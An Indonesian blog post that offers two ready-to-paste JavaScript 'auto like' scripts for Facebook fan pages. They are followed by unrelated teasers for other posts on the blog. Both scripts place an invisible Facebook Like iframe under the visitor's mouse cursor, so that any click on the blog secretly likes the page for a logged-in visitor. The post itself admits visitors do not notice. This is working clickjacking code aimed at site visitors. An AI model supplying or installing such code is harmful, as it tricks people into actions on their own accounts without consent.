Skip to main content

Script Auto Like Facebook Fanspage Terbaru

Script Auto Like Facebook Fanspage Terbaru - Sudah lama ane gak update blog ini, soalnya banyaknya kegiatan kuliah yang makin susah, jadi gak update deh. Ok pada postingan sebelumnya ane udah membahas mengenai Kelas dan Objek Pada Java, sekarang saya akan membahas mengenai Script Auto Like Facebook Fanspage Terbaru. Sebenarnya sudah banyak blog yang membahas mengenai Script Auto Like Facebook Fanspage ini, tetapi banyak yang udah gak berjalan atau gak berfungsi lagi. Nah sekarang saya akan memberikan Script Auto Like Facebook Fanspage Terbaru yang 100% berjalan. Dan bahkan ada yang menjual script ini dengan harga yang tidak murah, tapi ane berikan pada agan secara gratis :)

Script Auto Like Facebook Fanspage Terbaru

Perlu agan tau Script Auto Like Facebook Fanspage adalah sebuah script untuk mendapatkan like dari para pengunjung blog secara paksa.Jika pengunjung mengklik link apapun di blog agan maka secara otomatis dia telah Like fanspage agan tanpa mereka sadari (dalam keadaan login facebook). Script bekerja dengan cara membuat tombol like/suka menjadi transparan atau tidak terlihat mengikuti cursor mouse kemanapun cursor tersebut bergerak. Jadi ketika pengunjung mengklik salah satu link atau apa saja di dalam blog, maka tanpa mereka sadari mereka telah mengklik tombol like/suka tersebut.

Sebenarnya ini cara "nakal" dan membuat pengunjung tidak nyaman, jadi pikirkan baik baik jika ingin memasangnya. Saran ane jika Ingin memasangnya, agan pasanglah di blog dummy agan, bukan di blog utama. Untuk menghindari hal hal yang mungkin merugikan blog utama agan.

Baiklah untuk cara pemasangannya tinggal pastekan kodenya pada widget html.
Inilah kode Script Auto Like Facebook Fanspage Terbaru

<script>
var fan_page_url = 'http://www.facebook.com/USERNAME';
var opacity = 0.0;
var time = 20000;
if((document.getElementById) && window.addEventListener || window.attachEvent){
(function(){
var hairCol = "#ff0000";
var d = document;
var my = -10;
var mx = -10;
var r;
var vert = "";
var idx = document.getElementsByTagName('div').length;
var thehairs = "<iframe id='theiframe' scrolling='no' frameBorder='0' allowTransparency='true' src='http://www.facebook.com/widgets/like.php?href=" + encodeURIComponent(fan_page_url) + "&amp;layout=standard&amp;show_faces=true&amp;width=53&amp;action=like&amp;colorscheme=light&amp;height=80' style='position:absolute;width:53px;height:23px;overflow:hidden;border:0;opacity:" + opacity +";filter:alpha(opacity=" + opacity * 100+ ");'></iframe>";
document.write(thehairs);
var like = document.getElementById("theiframe");
document.getElementsByTagName('body')[0].appendChild(like);
var pix = "px";
var domWw = (typeof window.innerWidth == "number");
var domSy = (typeof window.pageYOffset == "number");
if (domWw)
r = window;
else{
if (d.documentElement && typeof d.documentElement.clientWidth == "number" && d.documentElement.clientWidth != 0)
r = d.documentElement;
else{
if (d.body && typeof d.body.clientWidth == "number")
r = d.body;
}
}
if(time != 0){
setTimeout(function(){
document.getElementsByTagName('body')[0].removeChild(like);
if (window.addEventListener){
document.removeEventListener("mousemove",mouse,false);
}
else if (window.attachEvent){
document.detachEvent("onmousemove",mouse);
}
}, time);
}
function scrl(yx){
var y,x;
if (domSy){
y = r.pageYOffset;
x = r.pageXOffset;
}
else{
y = r.scrollTop;
x = r.scrollLeft;
}
return (yx == 0) ? y:x;
}
function mouse(e){
var msy = (domSy)?window.pageYOffset:0;
if (!e)
e = window.event;
if (typeof e.pageY == 'number'){
my = e.pageY - 5 - msy;
mx = e.pageX - 4;
}
else{
my = e.clientY - 6 - msy;
mx = e.clientX - 6;
}
vert.top = my + scrl(0) + pix;
vert.left = mx + pix;
}
function ani(){
vert.top = my + scrl(0) + pix;
setTimeout(ani, 300);
}

function init(){
vert = document.getElementById("theiframe").style;
ani();
}
if (window.addEventListener){
window.addEventListener("load",init,false);
document.addEventListener("mousemove",mouse,false);
}
else if (window.attachEvent){
window.attachEvent("onload",init);
document.attachEvent("onmousemove",mouse);
}
})();
}//End.
</script>

KETERANGAN:
Ganti Tulisan USERNAME dengan username fanspage agan


Atau Bisa Juga Pakai script Ini, Silahkan Pakai salah satu

<script type="text/javascript">
(function(){

var Xcord = 0,
Ycord = 0,
IE = document.all ? true : false;

if (!IE) document.captureEvents(Event.MOUSEMOVE);

var lbox = document.createElement('iframe');
lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent(/*document.location.href*/ 'http://www.facebook.com/ganooxblog') + '&amp;layout=standard&amp;show_faces=true&amp;width=53&amp;action=lbox&amp;colorscheme=light&amp;height=80';
lbox.scrolling = 'no';
lbox.frameBorder = 0;
lbox.allowTransparency = 'true';
lbox.style.border = 0;
lbox.style.overflow = 'hidden';
lbox.style.cursor = 'pointer';
lbox.style.width = '53px';
lbox.style.height = '23px';
lbox.style.position = 'absolute';
lbox.style.opacity = 0;
document.getElementsByTagName('body')[0].appendChild(lbox);

window.addEventListener('mousemove', mouseMove, false);

setTimeout(function(){
document.getElementsByTagName('body')[0].removeChild(lbox);
window.removeEventListener('mousemove', mouseMove, false);
}, 15000);

function mouseMove(e) {
if (IE) {
Xcord = event.clientX + document.body.scrollLeft;
Ycord = event.clientY + document.body.scrollTop;
} else {
Xcord = e.pageX;
Ycord = e.pageY;
}

if (Xcord < 0) Xcord = 0;
if (Ycord < 0) Ycord = 0;

lbox.style.top = (Ycord - 8) + 'px';
lbox.style.left = (Xcord - 25) + 'px';

return true
}
})();

</script>

Ganti tulisan ganooxblog dengan username fanspage agan.

Sekian dulu postingan Script Auto Like Facebook Fanspage Terbaru ini, semoga postingan Script Auto Like Facebook Fanspage Terbaru ini berguna bagi agan-agan sekalian. Tapi ingat gunakanlah Script Auto Like Facebook Fanspage Terbaru ini dengan bijak dan benar :)
KLIK DISINI UNTUK DOWNLOAD



Comments

Post a Comment

Popular posts from this blog

Versi Teks Dragon Ball Z Episode 200 Bagian 3

Sebelumnya : Dragon Ball Z Episode 200 Bagian 2

"Hei Videl, apa menurutmu dia lebih kuat dari ayahmu?" Teman gadis di sebelah kirinya bertanya. "Jangan bodoh, ayah Videl adalah Mr.Satan, penyelamat Bumi!" ucap siswa yang duduk di depan Videl. "Tak seorangpun di dunia ini yang lebih kuat darinya."

Setelahnya, pak guru masuk kelas. Videl kembali duduk di kursinya, dan pelajaran akan segera dimulai. Namun sebelum itu, pak guru hendak memperkenalkan seorang siswa baru. ya, dia tak lain adalah Son Gohan.

"Selamat pagi semuanya, hari ini kita kedatangan mahasiswa baru. Silakan masuk."

"Perkenalkan, namaku Son Gohan. Senang bertemu dengan kalian."


"Wah, tampan sekali, dia adalah tipeku." ucap teman Videl.
"Gohan? nama yang aneh." ucap siswa di depan Videl.
Sejenak Videl terdiam, dan kemudian teringat kalau, "Sepertinya aku pernah bertemu dengannya."

"Fufufu, dia terlihat seperti seorang kutu buku." ucap Sharpen…

Download Movie Twilight Saga : Breaking Dawn Part 2

Download Movie Twilight Saga : Breaking Dawn Part 2 Sinopsis:
Cerita ini dimulai ketika Bella (Kristen Stewart) melahirkan seorang putri bernama Renesmee, setelah ibu nya Renee, dan ibu adopsi Edward (Robert Pattinson), Esme. Jacob (Taylor Lautner) melindungi anak dan orang tua baru tersebut dari wujud serigalanya Saat Volturi mengetahui tetang Renesmee, mereka berasumsi bahwa keluarga Cullen telah merusak hukum vampir dan menciptakan hukum baru dengan mengubah seorang anak manusia menjadi anak vampir.


Alice memiliki penglihatan bahwa Volturi akan datang membunuh mereka semua, dan tidak ada alasan yang kuat untuk mereka bertahan. Keluarga Cullen memanggil teman-teman vampir dari seluruh dunia untuk mengetahui keberadaan Renesmee sehingga mereka dapat membuktikan bahwa ia adalah manusia/keturunan vampir. Saat Alice dan Jasper menghilang, keluarga Cullend mengkhawatirkan yang terburuk dan mempersiapkan diri mereka untuk sebuah perang besar. 
Yah, mungkin sekian dulu ulasan tentang cerita in…

The Dark Knight Rises Apk Game Android

download Game The Dark Knight Rises Free Android

Anda pasti sudah mengenal super hero yang satu ini, ya Batman si manusia kelelawar. Cerita Komik yang sudah diadaptasi kedalam berbagai hal, mulai dari film kartun hingga layar lebar ini kini tersedia dalam bentuk game untuk android.

dalam game The Dark Knight Rises anda akan memerankan diri sebagai BATMAN untuk menyelamatkan kota tercintanya: